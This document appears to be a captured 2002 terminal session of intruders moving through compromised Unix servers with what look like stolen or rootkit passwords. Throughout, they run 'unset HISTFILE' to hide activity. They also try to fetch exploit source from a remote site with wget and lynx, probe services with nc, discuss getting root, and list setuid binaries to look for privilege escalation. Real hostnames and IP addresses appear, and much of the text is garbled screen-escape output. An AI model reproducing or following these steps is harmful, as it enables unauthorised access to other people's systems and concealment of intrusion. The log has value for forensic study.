Script started on Mon Jan 14 02:13:30 2002 [root@webserver /root]# ssh -v bob @kas.net.au SSH Version 1.2.27 [i586-unknown-linux], protocol version 1.5. Standard version. Does not use RSAREF. webserver: Reading configuration data /etc/ssh/ssh_config webserver: ssh_connec t: getuid 0 geteuid 0 anon 0 webserver: Connecting to kas.net.au [203.89.192.24 4] port 22. webserver: Allocated local port 1021. webserver: Connection establi shed. webserver: Remote protocol version 1.99, remote software version OpenSSH_ 3.0.2p1 webserver: Waiting for server public key. webserver: Received server pu blic key (1152 bits) and host key (1024 bits). Host key not found from the list of known hosts. Are you sure you want to continue connecting (yes/no)? yes Host 'kas.net.au' added to the list of known hosts. webserver: Initializing ran dom; seed file /root/.ssh/random_seed webserver: IDEA not supported, using 3des instead. webserver: Encryption type: 3des webserver: Sent encrypted session ke y. webserver: Installing crc compensation attack detector. webserver: Received encrypted confirmation. webserver: No agent. webserver: Trying RSA authenticati on with key 'vpopmail@webserver' webserver: Server refused our key. webserver: Doing password authentication. bob@kas.net.au's password: webserver: Requesting pty. webserver: Requesting shell. webserver: Entering int eractive session. Last login: Mon Jan 14 18:32:09 2002 from mystic.uprising.net Linux 2.2.20-ow1-hap-2-lbsd1. bob@kas:~$ sxcreen -x bash: sxcreen: command not found bob@kas:~$ screen -x 7[?47h[r[m[2J[H[?7h[?1;4;6l[4l[?1h=[m(B[1;24r[H[2J[H[2Jbob@kas:~$ bob@kas:~$ this better ? bob@kas:~$ yes. bash: yes.: command not found bob@kas:~$ u here? bob@kas:~$ k bob@kas:~$ ssh -l crash bonq.net bob@kas:~$ bob@kas:~$ on sec.... bob@kas:~$ one s bob@kas:~$ i gotta login again. erm got fucked. brb bob@kas:~$ j this is my box.. u can log in direct if uwa nt he bob@kas:~$ k ready bob@kas:~$ ssh -l crash bonq.net bob@kas:~$ w 6:35pm up 48 days, 2:32, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bob@kas:~$ er gay /proc bob@kas:~$ ssh -l peter mail.knowltons.net bob@kas:~$ ssh -l webmistress www.cro-magnon.com The authenticity of host 'www.cro-magnon.com (216.122.109.178)' can't be establ i [H[2M[22BDSA key fingerprint is 8b:91:6f:f2:28:f8:cd:1d:2b:9e:91:4b:ec:14:3f:f3 . Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'www.cro-magnon.com,216.122.109.178' (DSA) to the li s webmistress@www.cro-magnon.com's password: Last login: Sun Jan 13 23:14:46 2002 from ns1.kas.net.au [H[7M[18B============== Cro-magnon.com ============== unset HISTFILEcro-magnon.com:[webmistress] % unset HISTFILE cro-magnon.com:[webmistress] % unset HISTFILE cro-magnon.com:[webmistress] % bash HISTFIL[webmistress@cro-magnon webmistress]$ unset HISTFILE [webmistress@cro-magnon webmistress]$ w 11:35pm up 41 days, 4:58, 1 user, load average: 0.20, 0.05, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT webmistr pts/0 ns1.kas.net.au 11:35pm 0.00s 1.96s ? - [webmistress@cro-magnon webmistress]$ uname -a Linux cro-magnon.com 2.2.16-3 #1 Mon Jun 19 19:09:50 EDT 2000 sparc unknown [webmistress@cro-magnon webmistress]$ dns bash: dns: command not found [webmistress@cro-magnon webmistress]$ /bin/dns bash: /bin/dns: No such file or directory [webmistress@cro-magnon webmistress]$ locate dns /usr/lib/libnss1_dns.so /usr/lib/libnss_dns.so /usr/lib/sendmail-cf/feature/nodns.m4 /usr/lib/linuxconf/descriptions/eng/dnsconf /usr/lib/linuxconf/descriptions/es/dnsconf /usr/lib/linuxconf/descriptions/fr/dnsconf /usr/lib/linuxconf/descriptions/ko/dnsconf /usr/lib/linuxconf/descriptions/pt/dnsconf /usr/lib/linuxconf/descriptions/se/dnsconf /usr/lib/linuxconf/help.eng/dnsconf /usr/lib/linuxconf/help.eng/dnsconf/conflict-1.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-2.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-3.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-4.html /usr/lib/linuxconf/help.eng/dnsconf/conflict.help /usr/lib/linuxconf/help.eng/dnsconf/conflict.html /usr/lib/linuxconf/help.eng/dnsconf/edit-1.html /usr/lib/linuxconf/help.eng/dnsconf/edit-2.html /usr/lib/linuxconf/help.eng/dnsconf/edit-3.html /usr/lib/linuxconf/help.eng/dnsconf/edit-4.html /usr/lib/linuxconf/help.eng/dnsconf/edit.help /usr/lib/linuxconf/help.eng/dnsconf/edit.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-1.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-2.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-3.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-4.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders.help /usr/lib/linuxconf/help.eng/dnsconf/forwarders.html /usr/lib/linuxconf/help.eng/dnsconf/intro-1.html /usr/lib/linuxconf/help.eng/dnsconf/intro.help /usr/lib/linuxconf/help.eng/dnsconf/intro.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-1.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-2.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-3.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-4.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-5.html /usr/lib/linuxconf/help.eng/dnsconf/iprange.help /usr/lib/linuxconf/help.eng/dnsconf/iprange.html /usr/lib/linuxconf/help.eng/dnsconf/primary-1.html /usr/lib/linuxconf/help.eng/dnsconf/primary-2.html /usr/lib/linuxconf/help.eng/dnsconf/primary-3.html /usr/lib/linuxconf/help.eng/dnsconf/primary-4.html /usr/lib/linuxconf/help.eng/dnsconf/primary-5.html /usr/lib/linuxconf/help.eng/dnsconf/primary-6.html /usr/lib/linuxconf/help.eng/dnsconf/primary-7.html /usr/lib/linuxconf/help.eng/dnsconf/primary-8.html /usr/lib/linuxconf/help.eng/dnsconf/primary.help /usr/lib/linuxconf/help.eng/dnsconf/primary.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-1.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-2.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-3.html /usr/lib/linuxconf/help.eng/dnsconf/secondary.help /usr/lib/linuxconf/help.eng/dnsconf/secondary.html /usr/lib/linuxconf/help.eng/dnsconf-msg-1.16r10.eng /usr/lib/linuxconf/images/dns.xpm /usr/lib/linuxconf/lib/dhcp2dns.sh /usr/lib/linuxconf/mailconf/rulesets.s96.dns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.fewdns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.nodns.cf /usr/lib/linuxconf/modules/dnsconf.so.1.16.10 /usr/lib/linuxconf/redhat/dnsconf.daemons /usr/man/man1/dnsquery.1 /usr/man/man1/dnsdomainname.1 /usr/bin/dnsquery /usr/include/linuxconf/module_apis/dnsconf_api.h /usr/include/linuxconf/module_apis/dnsconf_apidef.h /usr/local/tmp/apache_1.3.20/htdocs/manual/dns-caveats.html /usr/local/tmp/php-4.0.6/ext/standard/dns.c /usr/local/tmp/php-4.0.6/ext/standard/dns.h /usr/local/tmp/php-4.0.6/ext/standard/dns.o /usr/local/tmp/php-4.0.6/ext/standard/dns.lo /usr/local/include/php/ext/standard/dns.h /usr/src/redhat/BUILD/analog-4.13/docs/dns.html /usr/sparc-glibc20-linux/lib/libnss_dns-2.0.7.so /usr/sparc-glibc20-linux/lib/libnss_dns.so /usr/sparc-glibc20-linux/lib/libnss_dns.so.1 /bin/dnsdomainname /lib/libnss1_dns-2.1.2.so /lib/libnss1_dns.so.1 /lib/libnss_dns-2.1.2.so /lib/libnss_dns.so.2 /lib/libnss_dns.so.1 /sbin/dnsconf [webmistress@cro-magnon webmistress]$ locate dns | more /usr/lib/libnss1_dns.so /usr/lib/libnss_dns.so /usr/lib/sendmail-cf/feature/nodns.m4 /usr/lib/linuxconf/descriptions/eng/dnsconf /usr/lib/linuxconf/descriptions/es/dnsconf /usr/lib/linuxconf/descriptions/fr/dnsconf /usr/lib/linuxconf/descriptions/ko/dnsconf /usr/lib/linuxconf/descriptions/pt/dnsconf /usr/lib/linuxconf/descriptions/se/dnsconf /usr/lib/linuxconf/help.eng/dnsconf /usr/lib/linuxconf/help.eng/dnsconf/conflict-1.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-2.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-3.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-4.html /usr/lib/linuxconf/help.eng/dnsconf/conflict.help /usr/lib/linuxconf/help.eng/dnsconf/conflict.html /usr/lib/linuxconf/help.eng/dnsconf/edit-1.html /usr/lib/linuxconf/help.eng/dnsconf/edit-2.html /usr/lib/linuxconf/help.eng/dnsconf/edit-3.html /usr/lib/linuxconf/help.eng/dnsconf/edit-4.html /usr/lib/linuxconf/help.eng/dnsconf/edit.help /usr/lib/linuxconf/help.eng/dnsconf/edit.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-1.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-2.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-3.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-4.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders.help /usr/lib/linuxconf/help.eng/dnsconf/forwarders.html /usr/lib/linuxconf/help.eng/dnsconf/intro-1.html /usr/lib/linuxconf/help.eng/dnsconf/intro.help /usr/lib/linuxconf/help.eng/dnsconf/intro.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-1.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-2.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-3.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-4.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-5.html /usr/lib/linuxconf/help.eng/dnsconf/iprange.help --More-- /usr/lib/linuxconf/help.eng/dnsconf/iprange.html /usr/lib/linuxconf/help.eng/dnsconf/primary-1.html /usr/lib/linuxconf/help.eng/dnsconf/primary-2.html /usr/lib/linuxconf/help.eng/dnsconf/primary-3.html /usr/lib/linuxconf/help.eng/dnsconf/primary-4.html /usr/lib/linuxconf/help.eng/dnsconf/primary-5.html /usr/lib/linuxconf/help.eng/dnsconf/primary-6.html /usr/lib/linuxconf/help.eng/dnsconf/primary-7.html /usr/lib/linuxconf/help.eng/dnsconf/primary-8.html /usr/lib/linuxconf/help.eng/dnsconf/primary.help /usr/lib/linuxconf/help.eng/dnsconf/primary.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-1.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-2.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-3.html /usr/lib/linuxconf/help.eng/dnsconf/secondary.help /usr/lib/linuxconf/help.eng/dnsconf/secondary.html /usr/lib/linuxconf/help.eng/dnsconf-msg-1.16r10.eng /usr/lib/linuxconf/images/dns.xpm /usr/lib/linuxconf/lib/dhcp2dns.sh /usr/lib/linuxconf/mailconf/rulesets.s96.dns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.fewdns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.nodns.cf /usr/lib/linuxconf/modules/dnsconf.so.1.16.10 /usr/lib/linuxconf/redhat/dnsconf.daemons /usr/man/man1/dnsquery.1 /usr/man/man1/dnsdomainname.1 /usr/bin/dnsquery /usr/include/linuxconf/module_apis/dnsconf_api.h /usr/include/linuxconf/module_apis/dnsconf_apidef.h /usr/local/tmp/apache_1.3.20/htdocs/manual/dns-caveats.html /usr/local/tmp/php-4.0.6/ext/standard/dns.c /usr/local/tmp/php-4.0.6/ext/standard/dns.h /usr/local/tmp/php-4.0.6/ext/standard/dns.o /usr/local/tmp/php-4.0.6/ext/standard/dns.lo /usr/local/include/php/ext/standard/dns.h /usr/src/redhat/BUILD/analog-4.13/docs/dns.html /usr/sparc-glibc20-linux/lib/libnss_dns-2.0.7.so --More-- [K[webmistress@cro-magnon webmistress]$ hrmm ghey [webmistress@cro-magnon webmistress]$ uname -a Linux cro-magnon.com 2.2.16-3 #1 Mon Jun 19 19:09:50 EDT 2000 sparc unknown [webmistress@cro-magnon webmistress]$ hasnt been owned yet \; [webmistress@cro-magnon webmistress]$ wget www.netspace.net.au/~hellman/2.c bash: wget: command not found [webmistress@cro-magnon webmistress]$ fuck this [webmistress@cro-magnon webmistress]$ i'll get scut to write the sparc linux ex p[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45Cloit i left my ine on my box that's o [H[4h [4l/usr/lib/linuxconf/modules/dnsconf. [4h [4l/usr/lib/linuxconf/redhat/dnsconf.d [4h [4l/usr/man/man1/dnsquery.1 [4h [4l/usr/man/man1/dnsdomainname.1 [4h [4l/usr/bin/dnsquery [4h [4l/usr/include/linuxconf/module_apis/ [4h [4l/usr/include/linuxconf/module_apis/ [4h [4l/usr/local/tmp/apache_1.3.20/htdocs [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/include/php/ext/standard [4h [4l/usr/src/redhat/BUILD/analog-4.13/d [4h [4l/usr/sparc-glibc20-linux/lib/libnss [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lLinux cro-magnon.com 2.2.16-3 #1 Mo [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: wget: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lffline. [webmistress@cro-magnon webmistress]$ wha cih root pw did you use for this one? i [H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45Cloit i left mine on my box that's o [35P [35P[45Cneed to develop one i it! ]$ ]$ i dun got root yet ]$ here ]$ nor do i re ]2; Wuff ---- Wuff!! ]2;screenlo[Kwe can get root , but i need root on a diff linux box first to get the raw soc [H[4h [4l/usr/include/linuxconf/module_apis/ [4h [4l/usr/local/tmp/apache_1.3.20/htdocs [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/include/php/ext/standard [4h [4l/usr/src/redhat/BUILD/analog-4.13/d [4h [4l/usr/sparc-glibc20-linux/lib/libnss [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lLinux cro-magnon.com 2.2.16-3 #1 Mo [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: wget: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lffline. [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l ket to exploit the IRQc [webmistress@cro-magnon webmistress]$ yueah sec im looking [webmistress@cro-magnon webmistress]$ ssh -l whuichwns one ouwns.underworld.ne t[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45Cloit i left mine on my box that's o [35P [35P[45Cneed to develop oneit! [35P [35P [35P [35P[46Clinux box first to get the raw soc [35P [35P [35P[45Cf ]$ ]2; Wuff ---- Wuff!! ]2;screenssh -l uwns thream uwns.underworld.ne t ]$ exit [H[4h [4l/usr/src/redhat/BUILD/analog-4.13/d [4h [4l/usr/sparc-glibc20-linux/lib/libnss [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lLinux cro-magnon.com 2.2.16-3 #1 Mo [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: wget: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lffline. [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lket to exploit the IRQc [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: ssh: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4lexit [4h [4lcro-magnon.com:[webmistress] % ssh [K[K[K]2; Wuff ---- Wuff!! exit logout Connection to www.cro-magnon.com closed. ]2;screenbob@kas:~$ ssh -l thream uwns.underworld.net The authenticity of host 'uwns.underworld.net (209.48.190.43)' can't be establi s DSA key fingerprint is 71:3f:8b:ec:e7:aa:d5:7d:5c:13:2c:19:4a:86:7b:46. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'uwns.underworld.net,209.48.190.43' (DSA) to the lis t thream@uwns.underworld.net's password: Permission denied, please try again. thream@uwns.underworld.net's password: Permission denied, please try again. thream@uwns.underworld.net's password: bob@kas:~$ bob@kas:~$ ssh -l jack mercury.unixrules.net ssh: mercury.unixrules.net: Name or service not known bob@kas:~$ ssh -l aaron@bashful.happyhacker.com ssh_exchange_identification: Connection closed by remote host bob@kas:~$ sshh alter@corrupt.net The authenticity of host 'corrupt.net (204.91.24.40)' can't be established. RSA key fingerprint is b1:b5:36:58:e3:75:68:5a:98:a9:67:85:65:a3:c4:4b. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'corrupt.net,204.91.24.40' (RSA) to the list of know n alter@corrupt.net's password: Permission denied, please try again. alter@corrupt.net's password: bob@kas:~$ gay bob@kas:~$ which one of our root kit pw's do you try using? bob@kas:~$ maybe i know the right one bob@kas:~$ im just loo gging in then gona use dns ? bob@kas:~$ that sounds great. got nay more to try? bob@kas:~$ like 500 ? bob@kas:~$ ehe bob@kas:~$ hehe sdc > * bob@kas:~$ ssh -l tbyjs bjs james.kalifornia.co ssh: james.kalifornia.co: Name or service not known bob@kas:~$ ssh -l bjs james.kalifornia.com The authenticity of host 'james.kalifornia.com (208.179.59.2)' can't be establi s DSA key fingerprint is f7:81:a7:da:b9:d0:86:8c:7f:61:2b:7b:e3:2a:62:1f. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'james.kalifornia.com,208.179.59.2' (DSA) to the lis t bjs@james.kalifornia.com's password: Permission denied, please try again. bjs@james.kalifornia.com's password: bob@kas:~$ fucking a .. thats scuts box too heh bob@kas:~$ nc -p 4438 james.kalifornia.com 21 220 ProFTPD 1.2.3 Server (Blue Labs FTP server) [james.kalifornia.com] bob@kas:~$ nc -p 4438 james.kalifornia.com 21 3 5 220-james.kalifornia.com ESMTP Sendmail 8.12.1/8.12.1; Sun, 13 Jan 2002 23:38:5 5 220- 220-Spam is prohibited here and any detected spam may be used in prosecution 220-against the spammer. This sendmail setup uses PgSQL (postgres) for most of 220-it's tables, for information on this, see 220-http://blue-labs.org/clue/sendmail.php 220 bob@kas:~$ nc -p 4438 mail.knowltons.net 110 owned notowned lame dead fucked ghey bob@kas:~$ ssh -l marcos@aladdin.danforthcenter.org The authenticity of host 'aladdin.danforthcenter.org (216.88.164.28)' can't be e RSA key fingerprint is 81:da:37:60:28:40:25:b7:8e:50:c3:4c:44:ad:99:de. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'aladdin.danforthcenter.org,216.88.164.28' (RSA) to t marcos@aladdin.danforthcenter.org's password: Last login: Fri Jan 11 23:28:45 2002 from pppa16-resalejonesboro1-3r7068.dialin x yzhang has logged on pts/0 from 10.15.0.42. marcos has logged on pts/1 from ns1. marcos@leaf[~]1: unset HISTFILE marcos@leaf[~]2: w 1:42am up 31 days, 14:58, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yzhang pts/0 10.15.0.42 Fri 7pm 7:10m 0.07s 0.07s -bash2 marcos pts/1 ns1.kas.net.au 1:42am 0.00s 0.12s 0.01s w marcos@leaf[~]3: uname -a Linux leaf 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT 2001 i686 unknown marcos@leaf[~]4: dns CORRECT>ns (y|n|e|a)? no dns: Command not found. marcos@leaf[~]5: marcos@leaf[~]5: wtf [Kmarcos@leaf[~]5: /bin/dns /bin/dns: Command not found. marcos@leaf[~]6: /bin/nslookup /bin/nslookup: Command not found. marcos@leaf[~]7: wget wget: Command not found. marcos@leaf[~]8: lynx -source www.netspace.net.au/~hellman/2.c lynx: Command not found. marcos@leaf[~]9: this box is gay too [Kmarcos@leaf[~]9: ssh glen@fran.fifthavenuevideo.com The authenticity of host 'fran.fifthavenuevideo.com (65.116.201.196)' can't be e RSA key fingerprint is bf:53:df:ea:85:aa:73:4c:a9:cd:08:21:2f:05:57:4c. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'fran.fifthavenuevideo.com,65.116.201.196' (RSA) to t glen@fran.fifthavenuevideo.com's password: Permission denied, please try again. glen@fran.fifthavenuevideo.com's password: Last login: Fri Jan 11 23:33:48 2002 from 209.83.176.72 ]2;glen@fran.fifthavenuevideo.com: /home/glen[glen@fran glen]$ unset HISTFILE [glen@fran glen]$ w 2:45am up 9 days, 11:35, 1 user, load average: 0.14, 0.16, 0.11 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT glen pts/0 216.88.164.28 2:45am 0.00s 0.39s 0.08s w [glen@fran glen]$ uname -a Linux fran.fifthavenuevideo.com 2.4.2-2smp #1 SMP Sun Apr 8 19:15:45 EDT 2001 i 5 [glen@fran glen]$ dns bash: dns: command not found [glen@fran glen]$ /bin/dns bash: /bin/dns: No such file or directory [glen@fran glen]$ wget bash: wget: command not found [glen@fran glen]$ lynx --h lynx: Invalid Option: --h USAGE: lynx [options] [file] Options are: - receive options and arguments from stdin -accept_all_cookies accept cookies without prompting if Set-Cookie handling is o -anonymous apply restrictions for anonymous account, see also -restrictions -assume_charset=MIMEname charset for documents that don't specify it -assume_local_charset=MIMEname charset assumed for local files -assume_unrec_charset=MIMEname use this instead of unrecognized charsets -auth=id:pw authentication information for protected documents -base prepend a request URL comment and BASE tag to text/html outputs for -source dumps -blink force high intensity bg colors in color mode -book use the bookmark page as the startfile (off) -buried_news toggles scanning of news articles for buried references (on ) -cache=NUMBER NUMBER of documents cached in memory -case enable case sensitive user searching (off) -cfg=FILENAME specifies a lynx.cfg file other than the default -cmd_log=FILENAME log keystroke commands to the given file -cmd_script=FILENAME read keystroke commands from the given file (see -cmd_log) -child exit on left-arrow in startfile, and disable save to disk -color force color mode on with standard bg colors -connect_timeout=N set the N-second connection timeout (18000) -cookie_file=FILENAME specifies a file to use to read cookies -cookie_save_file=FILENAME specifies a file to use to store cookies -cookies toggles handling of Set-Cookie headers (on) -core toggles forced core dumps on fatal errors (off) -crawl with -traversal, output each page to a file with -dump, format output as with -traversal, but to stdout -debug_partial incremental display stages with MessageSecs delay (off) -display=DISPLAY set the display variable for X exec'ed programs -dont_wrap_pre inhibit wrapping of text in
when -dump'ing and -crawl'ing, mark wrapped lines in interactive session (off) -dump dump the first file to stdout and exit -editor=EDITOR enable edit mode with specified editor -emacskeys enable emacs-like key movement (off) -enable_scrollback toggles compatibility with comm programs' scrollback keys (may be incompatible with some curses packages) (off) -error_file=FILE write the HTTP status code here -force_empty_hrefless_a force HREF-less 'A' elements to be empty (close them -force_html forces the first document to be interpreted as HTML (off) -force_secure toggles forcing of the secure flag for SSL cookies (off) -forms_options toggles forms-based vs old-style options menu (on) -from toggle transmission of From headers (on) -ftp disable ftp access (off) -get_data user data for get forms, read from stdin, terminated by '---' on a line -head send a HEAD request (off) -help print this usage message -hiddenlinks=[option] hidden links: options are merge, listonly, or ignore -historical toggles use of '>' or '-->' as a terminator for comments (o f -homepage=URL set homepage separate from start page -image_links toggles inclusion of links for all images (off) -index=URL set the default index file to URL -ismap toggles inclusion of ISMAP links when client-side MAPs are present (off) -justify do justification of text (on) -link=NUMBER starting count for lnk#.dat files produced by -crawl (0) -localhost disable URLs that point to remote hosts (off) -mime_header include mime headers and force source dump -minimal toggles minimal versus valid comment parsing (off) -newschunksize=NUMBER number of articles in chunked news listings -newsmaxchunk=NUMBER maximum news articles in listings before chunking -nobold disable bold video-attribute -nobrowse disable directory browsing -nocc disable Cc: prompts for self copies of mailings (off) -nocolor turn off color support -nofilereferer disable transmission of Referer headers for file URLs (on) -nolist disable the link list feature in dumps (off) -nolog disable mailing of error messages to document owners (on) -nonrestarting_sigwinch make window size change handler non-restarting (off) -nopause disable forced pauses for statusline messages -noprint disable some print functions, like -restrictions=print (off ) -noredir don't follow Location: redirection (off) -noreferer disable transmission of Referer headers (off) -noreverse disable reverse video-attribute -nostatus disable the miscellaneous information messages (off) -nounderline disable underline video-attribute -number_fields force numbering of links as well as form input fields (off) -number_links force numbering of links (off) -partial toggles display partial pages while downloading (on) -partial_thres [=NUMBER] number of lines to render before repainting display with partial-display logic (-1) -pauth=id:pw authentication information for protected proxy server -popup toggles handling of single-choice SELECT options via popup windows or as lists of radio buttons (off) -post_data user data for post forms, read from stdin, terminated by '---' on a line -preparsed show parsed text/html with -source and in source view to visualize how lynx behaves with invalid HTML (off) -prettysrc do syntax highlighting and hyperlink handling in source vie w -print enable print functions (DEFAULT), opposite of -noprint (on) -pseudo_inlines toggles pseudo-ALTs for inlines with no ALT string (on) -raw toggles default setting of 8-bit character translations or CJK mode for the startup character set (off) -realm restricts access to URLs in the starting realm (off) -reload flushes the cache on a proxy server (only the first document affected) (off) -restrictions=[options] use -restrictions to see list -resubmit_posts toggles forced resubmissions (no-cache) of forms with method POST when the documents they returned are sought with the PREV_DOC command or from the History List (off) -rlogin disable rlogins (off) -selective require .www_browsable files to browse directories -short_url enables examination of beginning and end of long URL in sta t -show_cursor toggles hiding of the cursor in the lower right corner (on) -show_rate toggles display of transfer rate (on) -soft_dquotes toggles emulation of the old Netscape and Mosaic bug which treated '>' as a co-terminator for double-quotes and tags ( o -source dump the source of the first file to stdout and exit -stack_dump disable SIGINT cleanup handler (off) -startfile_ok allow non-http startfile and homepage with -validate (off) -stdin read startfile from standard input (off) -tagsoup use TagSoup rather than SortaSGML parser (off) -telnet disable telnets (off) -term=TERM set terminal type to TERM -tlog toggles use of a Lynx Trace Log for the current session (on ) -tna turn on "Textfields Need Activation" mode (off) -trace turns on Lynx trace mode (off) -traversal traverse all http links derived from startfile -underscore toggles use of _underline_ format in dumps (off) -use_mouse turn on mouse support (off) -useragent=Name set alternate Lynx User-Agent header -validate accept only http URLs (meant for validation) implies more restrictions than -anonymous, but goto is allowed for http and https (off) -verbose toggles [LINK], [IMAGE] and [INLINE] comments with filenames of these images (on) -version print Lynx version information -vikeys enable vi-like key movement (off) -width=NUMBER screen width for formatting of dumps (default is 80) -with_backspaces emit backspaces in output if -dumping or -crawling (like 'm a [glen@fran glen]$ lynx - [glen@fran glen]$ find / \( \( -perm -4000 -o -perm -2000 \) \) > z find: /home/jparis: Permission denied find: /home/drussell: Permission denied find: /home/fran/mail: Permission denied find: /usr/lib/pgsql/backup: Permission denied find: /var/lib/slocate: Permission denied find: /var/lib/pgsql/backups: Permission denied find: /var/lib/pgsql/data: Permission denied find: /var/lib/mysql/mysql: Permission denied find: /var/lib/mysql/test: Permission denied find: /var/lib/mysql/watsekacomm: Permission denied find: /var/spool/at: Permission denied find: /var/spool/cron: Permission denied find: /proc/1/fd: Permission denied find: /proc/2/fd: Permission denied find: /proc/3/fd: Permission denied find: /proc/4/fd: Permission denied find: /proc/5/fd: Permission denied find: /proc/6/fd: Permission denied find: /proc/7/fd: Permission denied find: /proc/431/fd: Permission denied find: /proc/436/fd: Permission denied find: /proc/557/fd: Permission denied find: /proc/572/fd: Permission denied find: /proc/607/fd: Permission denied find: /proc/641/fd: Permission denied find: /proc/647/fd: Permission denied find: /proc/648/fd: Permission denied find: /proc/657/fd: Permission denied find: /proc/676/fd: Permission denied find: /proc/700/fd: Permission denied find: /proc/738/fd: Permission denied find: /proc/739/fd: Permission denied find: /proc/740/fd: Permission denied find: /proc/741/fd: Permission denied find: /proc/742/fd: Permission denied find: /proc/743/fd: Permission denied find: /proc/3417/fd: Permission denied find: /proc/4417/fd: Permission denied find: /proc/12263/fd: Permission denied find: /proc/12264/fd: Permission denied find: /proc/12265/fd: Permission denied find: /proc/12266/fd: Permission denied find: /proc/12267/fd: Permission denied find: /proc/12268/fd: Permission denied find: /proc/12269/fd: Permission denied find: /proc/12270/fd: Permission denied find: /proc/17543/fd: Permission denied find: /proc/17581/fd/5: No such file or directory find: /proc/17581/fd/5: No such file or directory find: /etc/default: Permission denied find: /etc/httpd/conf/ssl.crl: Permission denied find: /etc/httpd/conf/ssl.crt: Permission denied find: /etc/httpd/conf/ssl.csr: Permission denied find: /etc/httpd/conf/ssl.key: Permission denied find: /etc/httpd/conf/ssl.prm: Permission denied find: /root: Permission denied [glen@fran glen]$ cat z /usr/bin/at /usr/bin/suidperl /usr/bin/sperl5.6.0 /usr/bin/lockfile /usr/bin/chage /usr/bin/gpasswd /usr/bin/slocate /usr/bin/passwd /usr/bin/wall /usr/bin/chfn /usr/bin/chsh /usr/bin/newgrp /usr/bin/write /usr/bin/ssh /usr/bin/crontab /usr/sbin/traceroute 